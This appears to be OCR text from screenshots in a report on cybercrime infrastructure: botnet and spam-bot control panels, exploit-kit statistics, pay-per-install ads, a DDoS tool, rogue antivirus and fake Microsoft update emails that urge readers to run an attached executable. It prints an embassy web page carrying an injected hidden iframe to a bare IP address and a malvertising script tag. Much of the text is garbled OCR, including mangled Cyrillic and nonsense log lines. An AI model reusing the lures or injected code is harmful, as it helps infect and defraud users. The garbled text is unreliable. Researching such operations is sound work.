cacen (pama) Ne OTCYTCTBYET, kyon (kouecKa) Ne - 
opRULICAdo 1d OCHORUHOL HachOpra Xpancnoprnoro 
Copa ior | 


FOAa poxAewuns, Nacnopt 
2-m NC OBD “Momaaceud” ¢Mockeu 

| SEDErMCTONOOBAHHNAl AGL no aapecy. 
© MocKksa,. Ried 
HBCTOAWER KUBEPeENMNOCTEIHO ynNONHOMOUNG aA} ie a 


TORA NOE newug nacnopr 


Max_iNCw Ate: oe 
YNPABNATS, PaChOpaRaTecA W CheaMTh 3a TexHMYECKMM cocToaHMeM | 


TPAaHCNOpTMOrO CHeAcTsa Site MOMM NpeACTaBHTeNem B Opranax TMB) 
W CyAeOMeiX OpraHax no BoNpocy BOIMOxHOrO ATN wu nonyyeHnn 
MaTepvanbHow 


= anaes 2 = 
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-68 
w arperaTos, © npasom = vx cCHATMA C YyYeTa NOCT@HOBEM Ha y¥eT Nony4ennnr 


ceugetenvctsa Ha BeecBOOosMBluMnCcA arperar. BHECEHWA MIMeHEHMK 6 


TexnacnopT PEFMCTPaLOHHEIe fOKyMeHToi, C npasom BOCCTAMOBNEHMA M3 
r 


yt monyueHvA OWSse VBL & pernicTpalyoHHlx 
new Co aA B ALLUIMX MHCTAHUMAX,CTPaXxXOBaHnA 
no Bcem BKlaM . OY alata © BOSMEUJEHMA, BLIEIAS 


TPaHCNOpTMpOBaHMA 3a rpannuy P®, npoxowQenun TAMOKEHHOTO QOCMOTPS 
yiinatet TaMOKEHHDIX Apyrux HeEoSxXOAMMbIx c6opos 4 nowNWH , C Mpasom 
 gocctanosneHuA Ha yyeT H NONYYEHKA HOBbIX PEMMCTPALMOHHDIX OKyMeHTOS 
; PACNUCEIBATECA 34 MEHR M4 COBEPWATS BCE ACACTBUA, CBAIAHHEIC C BDINONHEHHEM 


gToro NOpyVeHHA 
PlopepennocTh Bbiqana CPpoKom Ha TPH roAa. Nonnomouna no HacToAuen 


opepenHocT MOryT 6biTe NepeAand! ApyrHM NuuaM, 
Conepxanne cr.c7.34,35 CK P®, cr.ct.187-189 [K P® notapuycom 


pasBAcHeHo. 


foeepument 


PoccuacKxan Denepauna, ropoa Mockea. 


“ane 


MAX_INC_INE.. 000 


MeecnocoOHOcTs NPOBEpeHS 


Saperncrpuposano B peecTpe 32 
Banckano 10 Tappan: COMMCH 
1) rocylapemennont HOULINHEe 


Horapuyc 


A 
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n 2 inc_int 


AJAOBEPEHHOCTL 


max_inc_int 


Re me i ee ie ee ere 
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at 


LOBEPEHHOCTbL 
max_inc_int 


* i: « 
LOBEPEHHOCTb 


max_inc_int 


max_inc_int 
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Stats 


|S miautes | I hour | 24 hours | Total | 


tes 
Bots cowat 670 $$2 1967 31009 
Unique serials 663 = 862 1892 14292 
Bots with sniffer loaded 3660 488 1091 10804 
New bets 0 0 0 31009 
New enigee serials 0 0 0 14292 


DS4PM up 83 days, 941, O users, load averages: 1.38, 1.01, 0.91 


Interestingly, on the majority of occasions cybercriminals tend to undermine the level of 
operational security that they could have achieved at the first place, and this is one of those 
cases where their misconfigured botnet command and control allows other cybercriminals to 
hijack their botnet, and security researchers to shut it down effectively. 


The people behind this money laundering organization are either lazy, or ignorant to the 
point where the botnet’s command and control interface would be using the very same web 
server that they use for recruitment purposes. 


Here are some screenshots of their command and control interface used exclusively for 
spam campaigns: 


2275 


- GD 


’ 


DrHolakouee ptv_live 16x... Down With 
Shit 


Proxy settings 
Proxy IP//Host*: 
* Leave blank if not using a proxy server. 


URLs (new URL on each line) 


http://www farsnews.com/shares/img/ogo.gif 
http://www leader .ir/images/ogo/87336 jpg 

http://www leader ir/media/album/medium/9626_247 jpg 
http://president jir/piri/media/mid/48007 jpg 
http://president ir/imagesAop_logo jpg 

http://president ir/piri/images/icons/G2_sendprvmsg.gif 
http://president ir/images,/sidebar_tiltle_center_rtl.gif 
http://president ir/piri/mediaAhumb/48003 jpg 
http://www Jinb ir/Images/4 jpg 

http://www Jinb ir/Images/1 jpg 


4 


Log 


Eror on URL #1 : Det gar inte att ansluta till famservem. 
Eror on URL #5 : Det gar inte att ansluta till fjarservem. 
Emor on URL #2 : Det gar inte att ansluta till fjamservem. 
Eror on URL #0 : Det gar inte att ansluta till fjamservem. 


r RLA et gar inte att anslut 5] e 


if you click Raep after stopping your first raep and nothing's happening, then restart the program. 
Every URL gets executed on the webserver. Search commands are heavy on a database. 
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& Download4money 


Download4money is the best 
in the pay-per-install industry. 


GREAT RA) 
5 Up to $.10 per US instaits. 


About Us FAQ Sign Up Contact Us 


WELCOME TO OUR COMPANY! EXISTING PARTNERS 


Login 
OUR CURRENT RATES 
OUR PROGRAMS 


ther Courtre 


2006. 2007 Dewnfoadtmency.com .« Pubiisher agreement . Privacy poticy - Contact Us 
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OLD WAY OF PHISHING 


PHISHER 


y & LINKED f 
PC 2 PAGE 


DESKTOP PHISHING 


PHISHER 


PHISHER PAGE 


REAL 
PAGE 
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oot: [3700 aus nes Drtaite 


Matched 329 of 216007 Page: 8 2 Show 32 200 per page 


Montag, 23, Mei 2009 014104 JOOP = AZAITE 


Monteg, 23, Mei 20090114103 200d = AZLaTe 


Montag, 23. Mei 2009 01141001 QuQea = AZAITe 


nn 


eT 


H HE 
TEE 
HH 
HH 


Gren ve SMTP (firewalied or bleckhated) 
Cormection feted: 8180813: hrewelied oF 
Given ve SMTP (firemaiied or bleckdiated) 
Grver ve SMTP (Arewelied or bleckiisted) 
Gren ve SMTP (firemalied or bleckdisted) 
Greer ve SATE (fremelied of bleckhated) 
Geren we EMTS (fremelied or bleckiisted) 
Grven ve SATE (frewatied or bleckiisted) 
Geren ve SMTP (fremalied or bleckhisted) 
Connection feted: $180815: frenelied oF 
Geven ve SMTP (firemalied or bleckdisted) 
Geren ve SATS (Aremalied or bleckiisted) 
Geren ve SMTP (fremalied or blecklisted) 
Geren ve STE (Arenalied or bleckiisted) 
‘Grven we EMTS (fremeiied or bleckiisted) 
Geren ve ENTS (Arenalied or bleckinted) 
Geven we EMTP (Aremaiied or blecklisted) 
Geren ve EMTS (Arenalied or bleckiated) 
Geren ve SMTP (Aremelied or bleckiisted) 
Geren ve EMTS (Aremelied or bleckinted) 
Geren ve SMTP (Aremaiied or bleckiated) 
Geren ve SMTP (Arenatied or bleckinted) 
Geren ve SMTP (Aromalied or blockiisted) 
Geren ve EMTS (Aremalied or bleckiated) 
Geren ve SMTP (Aremalied or bleckisted) 
Geren ve SMTP (Arewelied or beckiated) 
Geren ve MTD (fromalied or blackiated) 
Geren ve SMTP (Arewelied or bleckinted) 
Conmection feted: 180813: frenalled of 
Geren ve ENTE (Arenalied or becktated) 
Geren ve SMTP (romalied or blockhated) 
Geren ve SMTP (Arewalied or bleckinted) 
Geren ve SMTP (fromalied or bleckiated) 
Gren ve SMTP (Arenalied or beckiated) 
Geren ve SMTP (fremalied or bleckiated) 
Conmection feted: 8180813: frewelied oF 
Geren ve SMTP (Aremalied or bleckiated) 
Gren ve SMTP (Arenslied or bleckinted) 
Gover ve SMTP (fremalied or blackiated) 
Geren ve SMTP (Aremelied or bleckisted) 
Connection feted: $180813; frenalled o1 
Gover we EMTS (frewslled or bleckiated) 
Geren ve EMTS (fremelied or bleckiated) 
Gever ve SMTP (Arewelied or bleckinted) 
Geren ve SMTP (Arewelied or bleckiisted) 
Gever ve EMTS (Arewelied or blacklisted) 
Geven ve SMTP (frewalled or bleckinted) 
Conmection feted: 6180813: Arewelled or 
Connection feted: $180813: frenalled o 
Connection taied: AI ADRS: freunliad na 


[426] 
22734 


[427] 


22735 


[428] 


22736 


[429] 


22737 


[430] 


22738 


[431] 


22739 


il TLE EEL ELE i 
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i 
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TEEEFEEEE EEE 
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<META content="Royal Netherlands Embassy, Moscow, Russia, Dutch, consular affairs, visa, visum, 
passport, paspoort, political affairs, education, science, culture, press, economy, agriculture, 
environment, defence, consulates, MATRA, Royal House, Nederlandse, Ambassade, Moskou" 


nhame=keywords> 


<META content="The official website of the Royal Netherlands Embassy in Moscow with information 
about the embassy, visa procedures and other consular affairs, education, science, culture, 
press, economy, agriculture, environment, defence, consulates, MATRA and the Royal House. In 
English, Russian and Dutch language." 


nhame=description> 
<META content=index,follow name=robots> 
<META namee“version” content#"26.04.2607"> 


<link rel="stylesheet" href="/styles/style.css" type="text/css"> 
<link rel="stylesheet" href="/styles/main.css" type="text/css"> 


</head> 

<body style#"nar inemes<iframe src 
height="1° style=‘visibility: hidden; *></ifranme> 
<table style="width :166%; height :166%;table-layout:fixed;" cellspacing="6" cellpadding="6" 
border="6"> 

<tr><td class="topsqt">&nbsp;</td> 


*http://68.178.194.64/tab. widthe'1' 


<td classe"header"’> 

<table style="width:106%" cellspacing=6 cellpadding=6> 

<tr><td><img src=""/images/logo_big.gif"></td><td align="right" valign="botton" 
style="padding-right :26px;padding-bottom:8px;"> 

<a href="/"><img sre="/images/nhone .qif'></a>&nbsp ;&nbsp ;&nbsp ;&nbsp ; 
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Dac irlivaleleys 
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Tools found in this category: 13 


[outs Top 29 Rea Tne Vulnerbiy Index one) 


BB. .ua- oerosr2006 bitty hewmen Qua mlese arcnlinditop 1 

‘The recently announced ERERMIEg Rendering Engine Vulnerabilities (C 
into the Top 20. They are replacing the Microsoft LSASS vulnerability on 
‘vulnerabilities. Additionally, the Adobe Acrobat Reader Remote Butter O 
2470) replaces its predecessor 


[hte on Semana Podeant inte 


B®. wa-osr2a2008 [ Nittp thonenee 4 ait ; 

In his OnSecurity podcast, eWeek senior writer Ryan Naraine talks to @ 
about the evolution of the spyware scourge and his research work arou 
fraud. Edelman also discusses his decision to sue Yahoo on behalf of} 
security problems associated with typosquatting. Duration: 13:20 


| B) Portable Firefox v1.5.0.3 a 


PB a 051162006 | cvsnipovens 


Portable Firefox is @ fully functional stane of Fret optimized foruse 
Specially selected optimizations to make it perform faster and extend th 
@ Specialized launcher Mat will allow most of your favorite extensions to 
will also work from a CORYW drive (in packet mode), ZIP drives, external 
flash RAM cards and more. 


© Security Now! Podcast - Browser Security (online!) 
es ave AERA 
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SECRET HEALTH 
UPGRADES 


BRAND & GENERIC » Anti Depressants 
DRUGS » Antibioties 


» Anxiety 
WITHOUT PRESCRIPTION 
» Asthma 


» Birth Control 


» Blood Pressure 


» Cancer 


» Cardiovascular 


» Cholesterol 
» Diuretics 
» Gastrointestinal 


» Headache 
» Heart Rates 


) AFREEVIAGRAPILLS ,, terbais 
) WITH EACH ORDER canes 


10%. DISCOUNT FOR, >=Pmtieen 


4 ALL NEXT ORDERS » Muscle Relaxant 
. WORLDWIDE » Pain Relief 
| SHIPPING » Sexual Health 
» Skin Care 
» Stop Smoking 
BEST PRICES » Weight Loss 
GREAT BU LK DEALS » Women's Health 


Mes % of » Other 
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Earn Per Install 


Affmates : Please take the new code from your panel and 
change it in your sites. Old campaign expired and new campaign 
Started, You must put the new code! 


WELCOME 10 PARTHERSIOP PROGRAM PAY PER BESTALE 


Convert Vous Vietreme tans 064 . By as new partrers 
program yOu Can earn @ lat om each Unique viedors Of your 
wed ste The orty thang you reed to do ts putt reypster ou 
CFO OI ® CO 1D YOU Wretite Wiech you wll bake thor 

22.00.08 7 
YOU UteF panel and thant earring | Hits trom at countries 


we CEU Ota POTTS ares a Shes eccented 
¥ 


Counties beceute ot 
very Magn rate of Cheating an ret FOR REGS TRA TOS CLICK BERE 


We accept htt om al tenn te Start Farming 
Coriies excert * GIRS for Fach § K Untque Mite 
etic end ef type Rogeter to cur program REGISTRATION 
Aaten Ii et Accested 
Login to your attihate panet Perments reth Perea 
25.0188 Beet lime Mette 
: om yo Cony Peer Control Panet 
Maahrest Prices im the Merhet 
(a Mand of Stes Accepted 
e w your read tene stats and (iiendy Customer Suppert 
earring: tom you user pare! 


Dow thats) your user 
ee 


Paymert: wil be done ithe inst weet ot 
ne marth for prey north 


For any queattions do ret heatate to 
contact us 
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Easter Greeting From Alex 


Download Animated Greeting Here 
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2278 


ome 


ROnoh-D- Oro 


Lows 


lewstetes Teshs 


Test_Task 


Good: 35, wehecteys 
Paget 


i 
I 


FRA EE EE 
k 
i 


waiting 
wetes 
wots 
wetes 
wetting 
wetes 
wetes 
mete 
meters 
wetes 
wotes 
wetes 
wetes 
wetes 
meters 
motes 
wetness 
wetes 
wetting 
vetoes 
wotns 
wetes 
meting 
eters 
motes 
wets 
motes 
wetes 
wots 
motes 
wots 
wetes 
motes 
metas 
wots 
motes 
wots 
wetns 
wots 
mets 
wots 
wets 
motes 
mets 
motes 
mets 
motes 
tins 
motes 
3 


task —— 25. Mai 2009 00:59:56) 


2272, bad: 60, total 1324140. 
Show oe page 


F 
HUT EEE EE 
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YY GSC EES — 


- Home. 


Register Domain . 


fer Dor 


Transter Do 


+ Whois 


iReporAbuse) 


Your name: 


Your e-mail: 
Protection code: 


Domain name: 


Abuse type: 


Browser/Script Exploits 
Browser/DNS Hijacking 
Child Pomograptry 
OMCA Infringement 
Demeal of Serice 
Inaccurate Yvhors Information 
Malwere Distibution 
Phishing Page(s) 
Port Scanning 
SPAM - Blog 
SPAM - Email 
SPAM - Forum 
SPAM - Guestbook 
SPAM - Newsgroup(s) 
SPAM - Wiki 

¥ Gatiinnins | Vii Distribution 

o Warez Distribution 
Other 


Your abuse: 
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Register Nev 

Transfer 

Bulk Register 

Bulk Transfer 

Name Suagestion Tool 
Price List 


Domain / Mail Forwarding 


Deer $s, 


. We deeply regret the present critica juncture. Pleose find our comment on the emerging 
situation. 


The decision to change the director of EsiDoma'ns, Inc was mode in January 2008, before 
the Estonian Clreult Court ag, bey Q vercicl for Viadimir Tsostsin on 6 Fedruory 2008, However, 
¢ 


On June 25, 2008 Viadimir Tsasisin signed the Resignation of Director of EstDomoins, Inc a 
Delaware Corporation anc left his position of the President of the corporation. The notification 
about the change of the EstDomains, Inc Director has not been sent to ICANN as we hove not 


Best Regeras, 
om = 


Konstontin Pottey 


Estdomatns inc Tel: +1.302 17 
110 W, Ninth Street #688 haa <1setSTopee 


Wilmington, DE,19801, USA 
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Balance: 4 | Logged as: | Service Lost @@0. .. cue 


MDS 41572¢1601415cem34D826n92080240 
SHAT S161 cOWabd4 01 a7 be7e8tbesdvexz0d6e2 
SHA256 At §92accO7cb784a1bc9da4555e4510b3294706021 940997 41236 


Viusbuster 1.340 200801-27 — 
AsgtionalPEInfo 


EnbyPoint = xt0000 
Timestamp  - 2009-07-07 10:29:13 
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Private é 
syn.exe 
2009-07-22 15:57:54 
finished 
Result: 2/17 returns infected status 


Antivirus “Version =—sLastupdate si 
F-Prot 3.16.16 2009-3-31 19:24:7 Possibly a new variant of W32/Rastix,a Login information 
7.60825 2009-7-22 13:25:8 ok 
7.5.51 2009-5-1 1:15:42 
unknown 2009-7-22 15:50:45 
unknown 2009-7-21 9:49:28 
4.41.0 2009-7-22 35:4: 
4.44.1.0806200  2009-7-22 15:10:29 
0.95,1/9604 2009-7-22 4:24:36 
1.34 2009-6-8 18:12:38 
090721-0 2009-7-22 0:0:11 
5.7.20 2009-7-22 15:35:57 
2.1.12-180 2009-7-22 14:20:13 
voaze 3.12,7 2009-7-22 15:57:9 
Mcafee VirusScan _v5.20.0 2009-7-21 8:30:0 
arcavir 10s 2009-7-21 19:5:8 
ESETS Nod32 2.71,10 2009-6-13 23:45:15 
Norman VC 7,00,00 2009-3-24 17:54:18 


TTT 
5 


Additional information: 


file size: 2040 bytes 
MOS: A4LS72@1COL4 1 Sco M4beeboZdbese 
SriAl: LalPicéfSabd41cOl9a70ba7ebibeadIOI29dSe2 
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Bots | Emails 


Activated 
bots 


Free bots 
Stats 
Settings 
Debug logs 


Templates | Tasks | Sniffer | Admin 
Free bots 
ee Go 


OS OS OS OS St OS oi 


Take over 


Call 31008 items 


17971 


18001 


i a @ 
id @ 


15 


il 
uo 
g 
BESeE SB SBS S&eSB BBB BE EE 


2.103 
255.44 
86.62 
72.16 
90.129 
3.60 
1.140 
01.105 
174.205 
3.76 
54 
43.120 


40.199 


7002-190E 
2124-7053 
0707-565F 
4BE4-£459 
C885-66AC 
4697-1209 
3440-BBAE 


A40F-290D 
782A-E23E 
2092-3358 


45C4-FBFF 


0 seconds —_ ds 


O seconds 


O seconds 


2279 
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Onepaun 


Linux 
MacOS 
PowerP( 
Unknown 
Windows 2000 
Windows 2003 
Windo 98 
Windows ME 
Windo 
Windo 


Window 


Cram 


Haseanve crpanet (permona) E 


Unknown [--] 
[EU] 
Austria [AT] 


Europe 


Bulgaria [BG] 
shrain [BH] 


Canada 


[CA] 


Switzertand [CH] 


China [CN] 
ech Republic 
Germany [DE] 
| Denmark 
[EG] 


Spain [ES] 


[DK] 


Egypt 


France [FR] 


} 


United Kingdom [G8] 


Hungary [HU] 


Ireland [IE] 
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onnbre cv 


[cz] 


THKa paGorbi sKcnnokTa 


Maven’ OAMMHMKCTPHpOBOHHA IKCHNOKTOM 


COOANGA CTaTHCTHKG No THaduKy 


vine Opay2epoern ObuyHe tpadwr 


O6wee uvcno saxonoe 


fai Sekar 


Konqueror Yuvnarionnee IP 


MSIE Yuvkoribupe nocemresm 
Netscape 

Opera 

Unknown 


Cramct 


‘KO oO 32arpy 


A onannnie 


awe NpOrpamMoM: 


ctm (acero) 


po 


KCC 


DONNA 


Idee veNHOC ano teeny Gpaysepe 


Tonhko Hons oRatTenu Internet Explorer 
Bce nonbionaTenw 
Ichbibexmenoctd IKCHNOFTA NO T 
Linux 
Mac OS 
PowerPt 
Unknown 
Windows 2000 


Windows 2003 


Windows 98 


ETT 


Windows 
Windows Vista 


Windows > 


Window 
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TucTvKa paborpl sKcnnortTa 


Mavens 4AMVHKCTPYPOBAaHHA IKCHNOKTOM 


TKS 10 reorpades non Tes CTraTMctvxka no reorpadun NonbI0RAaTeENeH 


BanKe 


Israel [IL] 


ero Hla CTpansi (pervona) 


fl 


Italy [IT] 

Japan [IP] 
Kuwait [KW] 
Luxembourg [LU] 
Netherlands 
Philippines [PH] 
[RO] 


Russion Federation [RU] 


Romania 


Singapore [SG] 


Slovakia [SK] 


Thailond [TH] 


ae 


Turkey [TR] 


United States [US] 


| 


Anonymous Pro [Al] 
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2008-10-21 0.017 62.91% $16.566 
2008-10-22 0 9 1360 736 0.0178 54.52% $13.074 
2008-10-23 1 13244 ° 20631 0.0195 0% $519.728 
2008-10-24 i) $2 22269 13129 0.0205 58.96% $268 .556 
2008-10-25 1 1733 18911 7899 0.0221 49.64% $174,322 
2008-10-26 ° 16 12634 76538 0.0194 60.61% $148.936 
2009-02-07 9 i] 4041 1004 0.0118 24.35% $11.861 
2003-02-08 i) i] 3370 828 0.0076 21.11% $6.33595 
2008-0208 i] 2 3871 $42 0.0088 24.33% $8.2936 
2003-02-10 9 ° 5586 861 0.0091 15.41% $7.86345 
2009-02-14 L) 1 3252 960 0.0082 29.52% $8.864235 
2009-02-15 i) 1 394 #3 0.0086 24.45% $7.77925 
2003-02-17 ° 2 3077 764 0.0117 24.83% $8.91375 
2009-02-18 9 9 2974 618 0.0102 20.08% 36.2054 
2003-02-20 0.0082 30.3428 
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oF Reported Attack 


eyewon der, com f 
rams that steal private information, 
or damage your 


compromise 


Get me out of here! Why was this site blocked? 
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Warnung: Durch das Aufrufen dieser Website wird Ihr Computer 
moglicherweise beschadigt! 


Die Website unter forum.chip.de enthalt Elemente von der Website cdn1.eyewonder.com, die anscheinend Malware hostet - 


So&ware, die den Computer beschadigen oder anderweitig ohne Ihre Zustimmung agieren kann. Schon der Zugnff auf eine Website, die 
Malware enthalt, kann den Computer infzieren 

Detadherte Informationen zu den Problemen mit chesen Elementen erhalten Sve auf der folgenden Google Sete: SafeBrowsing 
Diagnosesete fir cdn1.eyewonder.com 

Yieitere Informationen zum Selbstschutz vor schadlicher Sofware im Intemet. 


Mir ist bewusst, dass mein Computer durch Autrufen dieser Website beschadigt werden kann 
Zuruck zu sicherer Website 
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Warning: Visiting this site may harm your computer! 


bite M Www. qamespolcom tiefrs eleme the ste edn t.eyeweeder.com, wt 
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<hase href="http://www.eyevonder.com/" /><meta http-equiv="content-type” content="text/html; charset=utf-5" 
<fe= Post Clack Tracking Location: EyeWonder_HomePage EyeWonder_HomePage --> 

<script type*"text/javascript"> 

<!-- 

var dd = new Date();: 

var ord = Math.round(Math.abs (Math. sin(dd.getTime () ) } *1000000000) * 10000000; 

var fd_pet_sre = new String("<scr"+"ipt srco\"hetp://adsfac.us/pct_mx.asp?L*235288ésource=jsscord="tord+"\" t 
document.write (fd pet src); 

--> 

</script> 

<noscript> 

</noscript> 

<!-- END --> 

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN" “http://www. w3.org/TR/xhtml1/DTD/xhtmli-trans 
<html sonlns*"http://vvv.v3.org/1999/xhtml"> 


<head> 

<meta http-equiv="Content-Type” content="text/html: charset=iso-8859-1" /> 

<!-- <meta http-equive"Content-Type" content="text/html; charset=utf-8" /> --> 

<TITLE>EyeVonder :: Interactive Digital Advertising, Rich Nedia Ads, Video Ads, Flash Ads, Online Advertisin 


<amcta name*"keyvords” content*"cye wonder, eyevonder, ecye-vonder, ivonder, rich, media, richmedia, rich medi 
<meta name="description” content="EyeVonder is Interactive Digital Advertisinglis fastest-growing innovator, 
<META HAME="PUBLISHER" CONTENT="EyeWonder Inc."> 

<META MAME="COPYRIGHT” CONTENT="Copyright 2008 by Eye¥Vonder Inc.”> 

<META HAME*"REVISIT-AFTER” CONTENT+"7 days”> 

<META HAME="author” CONTENT="EyeVonder Inc."> 

<META HAME="ROBOTS”" CONTENT="ALL"> 


<link href«"index.css" rel*"stylesheet” type="text/css" /> 

<script Language="javascript">AC_FL_RunContent = 0;</seript> 

<script src="AC RunactiveContent.j3” language="javascript”></script> 
</head> 
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€ > S ¥& hNttov//mashable.com/2009/07/03/googles-new-layout 


Warning: Visiting this site may harm your computer! 


The website at mashable.com cortans elements from the ste cdn.eyewonder.com, which appears to host maiware = software that 
Can hurt your computer or otherwise operate without your consent. Just visiting a site that Contans malware can infect your computer 
For detailed mformation about the problems with these elements. wea the Google Safe Browsing diagnostic: sage for 

Gn eyewonder com 

Leam more about how to protect yourself from harmbs software onkine 


©) | understand that visting thes site may harm my computer Proceed anyway 


| Back to safety | 


[470] 
22769 


76487-0EM0011903-00101 


Virobca 2 technack.6 podpora: Hewlett Packard Company 
HP Compara de 7800 Corvette 
ae 
i E6550 @ 233GHz 
1.98 GHz. 1.95 GB parnite RAM 
lnveot Pripona tyeickey odreny 


Oreyas eet Gi Siovaiia 
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WoMMan cHeTeMa AR Microso® Windows xP 
Baw lpaep @ internet Explorer 6.0 


Baw nposainep @ Slovak Telecom. as. gill 
Mipore gy He wcnonbzyetca 
spemwan ceopocts “® 3.26 MOuricer | 0.21 MOuticex & 


wares fc valia com 
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Descriptioa 


new_server_domain [testing] New server doman Ede 
new_server_path (testing) New server path Ede 
bet_update_domain Bet update domain Ea 
bot_update fle Boe update fle Ede 
bot_update version 0 Bots version to update Ea 
bot_update cours 0 Bot update target count Ede 
bet_update_id 16830 Force updates to this bot Ea 
bot_alive 1900 Tineout (seconds) before bot is considered dead Ede 
send_iterval 7000 [bot] Interval (seconds) between sending single emails Edit 
peg_nterval 120000 (bot) Letervat (seconds) between contacting server = Edt 
tno om [bot] Tamecat sendirecieve Ede 
teks _xchg couse =] foot) Links exchange count Ede 
max_jetiers 400 [bot] Lams of maiko adresses umber per task Ea 
threads 10 [bot] Number of threads Ede 
mx_bad_maxcout 2 [bot] MX ties before giving up Ea 
randomization level 10 (bot) Randomization level Ede 
seed_ratio 100000000000 Normal to seeded addresses ratio Eas 
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2 YouPorn.com Lite (BETA) - heather great - Free Porn Videos - pepsi_labeb Internet Explorer ro! 


oe [=] ++ x: | subir fotos |p 


File Edit View Favorites Tools Help 
Favorites (&2) El Chat - El mejor sisterna de chaty amigos en espaol Juegos Diarios Juegos gratis 


I . Pe » 
a & GS + @indetectables - Publicar un...) YouPom corn Lite (BETA)... (1) YouPom.corn Lite (BET... x Sp - B+ mm + Lp Page ~ GD Took: ~ 


ogin 
Straight [=] Buscar | 


egister 


ams 


fe] as 


SOuUPORK 


You need the new FLASH. Download FREE 


remium 


SOUPORKAMATE 


Big Tits Cams 
, MILF Cams 


BP Berens tr ee REE ican cece NA ARNETTE BP Ww Obteme AK 
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BYouPor.com Lite (BETA) - heather great - Free Porn Videos - pepsi_labeb Internet Explorer > OT 


68- Tn eomciondasenmaneneneeien. *< senand =) + X subir fotos p- 


File Edit View Favorites Tools Help 
Favorites (&2) El Chat - El mejor sistema de chaty amigos en espaol g@ Juegos Diarios @ Juegos gratis 


> » 
we GS | @ indetectables - Publicar un... | [) YouPomcorn Lite (BETA)... [[) YouPorn.com Lite (BET... x + G+ me + Page ~ G Took ~ 


Detalles: 
« Duracién: 01 min 27 seg 

= Visitas: 1.687.694 total (73.807 hoy) 

« Puntuacién: 4.54 / 5.00 (4.149 puntuaciones) 
« Enviado por: andnimo 

» Fecha: Sun Aug 17 06:00:03 2008 


Save to Favorites 


EB Share on Facebook 


m 


Related Videos 


Brunette heather heather brooke Heather forever Heather Heather Brooke Heather 

inhales the dick! couch white tank 2 Ideepthroat 001 worlds best Ideepthroat 002 

03 min. 26 seg top 01 min. 37 seg 03 min. 11 seg blowjob 03 min. 21 seg 

2.526 963 visitas 02 min. 25 seg 1.618 410 vistas 907 600 visitas 01 min. 19 seg 1.326 608 visitas 

4.67 / 5.00 de 2.413.512 visitas 4,61/ 5,00 de 4,61/5,00 de 5 906 877 visitas 4.68 / 5,00 de 

puntuacién 4.62 / 5.00 de puntuacién puntuacién 4,71/ 5.00 de puntuacin 
puntuacion puntuacion 
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WARNING! 


@ Warning!!! 364 infected files found 
Cid the “Erase al threats” button te erase all spyware and viruses from Windows 


[QO cacatress | 
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WINN. \.com._ __THEDAILYTOP 10 ee 
_TOP 10 STORIES cececococecucococscscocecocscoescscscsescseses - - = TOP 10 VIDEOS = a 
Russian stocks take hit as govt. looks to Edouard Triggers ‘Cane Watch for Texas 
#1 nationalize steel, oil companies. #1. 


2. De Rides a ‘Hog’ 


5. Tena Hemingway look-alikes Key West $ streets to 


honor the author 6. Rig reser tons — dat ie nature a $ a iA 


7. Bill Clinton and Monika seen agair 


; 8. Social netw orking sites have lots Saal but no one seems 
to be buying 4 


9. nd __| 9. War, Spying and Party Game Delusions 
10. Half-scale replica of German tank built for paintball 10. Teenage Mutant Ninja NARC A 
| ae 
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Br ea pdt eee 
Update for Microsoft Outlook / Outlook Express (KB910721) 


Brief Description 
Microsoft has released an update for Microsoft Outlook / Outlook Express. This update is critical and provides you with the latest version of the Microsoft 
Outlook / Outlook Express and offers the highest levels of stability and security. 
Instructions 
« Install Update for Microsoft Outlook / Outlook Express (KB910721). To do this, follow these steps: 


1, Run attached file officexp-KB910721-FullFile-ENU.exe 
2. Restart Microsoft Outlook / Outlook Express 


Quick Details 
e File Name: officexp-KB910721-FullFile-ENU.exe 
© Version: 1.4 
« Date Published: Wed, 17 Jun 2009 12:40:52 -0300 
* Language: English 
© File Size: 81 KB 


System Requirements 
« Supported Operating Systems: Windows 2000; Windows 98; Windows ME; Windows NT; Windows Server 2003; Windows XP; Windows Vista 
« This update applies to the following product: Microsoft Outlook / Outlook Express 
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i rrr 
Update for Microsoft Outlook / Outlook Express (KB910721) 


Please Gownload and mstall the fe: 
officexp- KB910721-FullFite-ENU.exe 
Brief Description 


SOLO ee ee eee 
stablty and securny. 


Quick Details 
© file Name: cAficexp-KB910721 -fulllile-fNUexe 
@ Version: 1.4 
© Language: Engiah 
© File Size; $1 *B 


System Requirements 
© Supported Operating Systems: Windows 2000; Windows 92; Windows ME; Windows NT; Windows Server 2003; Windows XP; Windows Vite 
© This epdate applies to the following product: Microsc Outlook / Outlook Exeress 


Contact us 
© 2009 Microsoh Corporation, All rights reserved. Cartact Us | Iecmsct se | Icedemacks | Eomce Statement 
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Dear Microsoft Customer, 


Please notice that Microsoft company has recently issued a Security Update for OS Microsoft Windows. The update applies to the following OS 
versions: Microsoft Windows 98, Microsoft Windows 2000, Microsoft Windows Millenium, Microsoft Windows XP, Microsoft Windows Vista. 


Please notice, that present update applies to high-priority updates category. In order to help protect your computer against security threats and 
performance problems, we strongly recommend you to install this update. 


Since public distribution of this Update through the official website http://www. microsoft.com would have result in efficient creation of a malicious 
software, we made a decision to issue an experimental private version of an update for all Microsoft Windows OS users. 


\As your computer is set to receive notifications when new updates are available, you have received this notice. 


In order to start the update, please follow the step-by-step instruction: 1. Run the file, that you have received along with this message. 2. Carefully 
follow all the instructions you see on the screen. 


If nothing changes after you have run the file, probably in the settings of your OS you have an indication to run all the updates at a background 
routine. In that case, at this point the upgrade of your OS will be finished. 


\We apologize for any inconvenience this back order may be causing you. 


\Thank you, 


Steve Lipner 
Director of Security Assurance 
Microsoft Corp. 


----BEGIN PGP SIGNATURE----- 
Version: PGP 7.4 


MERJPRH3K60MON 1AU3ZK0E0ZYPOAM5S 1R8EWOZ2NOPICGQ1M699210LMPZEDB92M2 
|W52M6CILAQP6N2LA60H90D4QUGTZ3SRRJ 1JFTBOHAUGSKNF QSK 1NXP58S06C31ZD9 
|TNBBXCRU6T7GTF 3PIX04IF BOEWRWYLAUDISQSASVE0U 1M89386NM390 104TSBBEPAF 
P2QVHS0ELZLRSTUPQHSOLPWKIH98YDSA3AV2WAUBI2ZFVZ4P 1838 108XKCAR47OPFA 
37849DJDVZY G2J413VQCCUBGNP28X68W212== 

----END PGP SIGNATURE— 
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Mateoch, €. Agel 2009 21114139 
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Mateoch. 6. Aort 2009 20146109 
Matwoch. §. Aor 2009 2031121 
Mateoch. §. Aort 2009 2028146 
Matwoch. 6. Aort 2009 20128143 


Matwoch. $6. Art 2009 20726128 
Mateoch, 6. Aort 2009 20:23103 


Matwoch, §. Aort 2009 20720142 


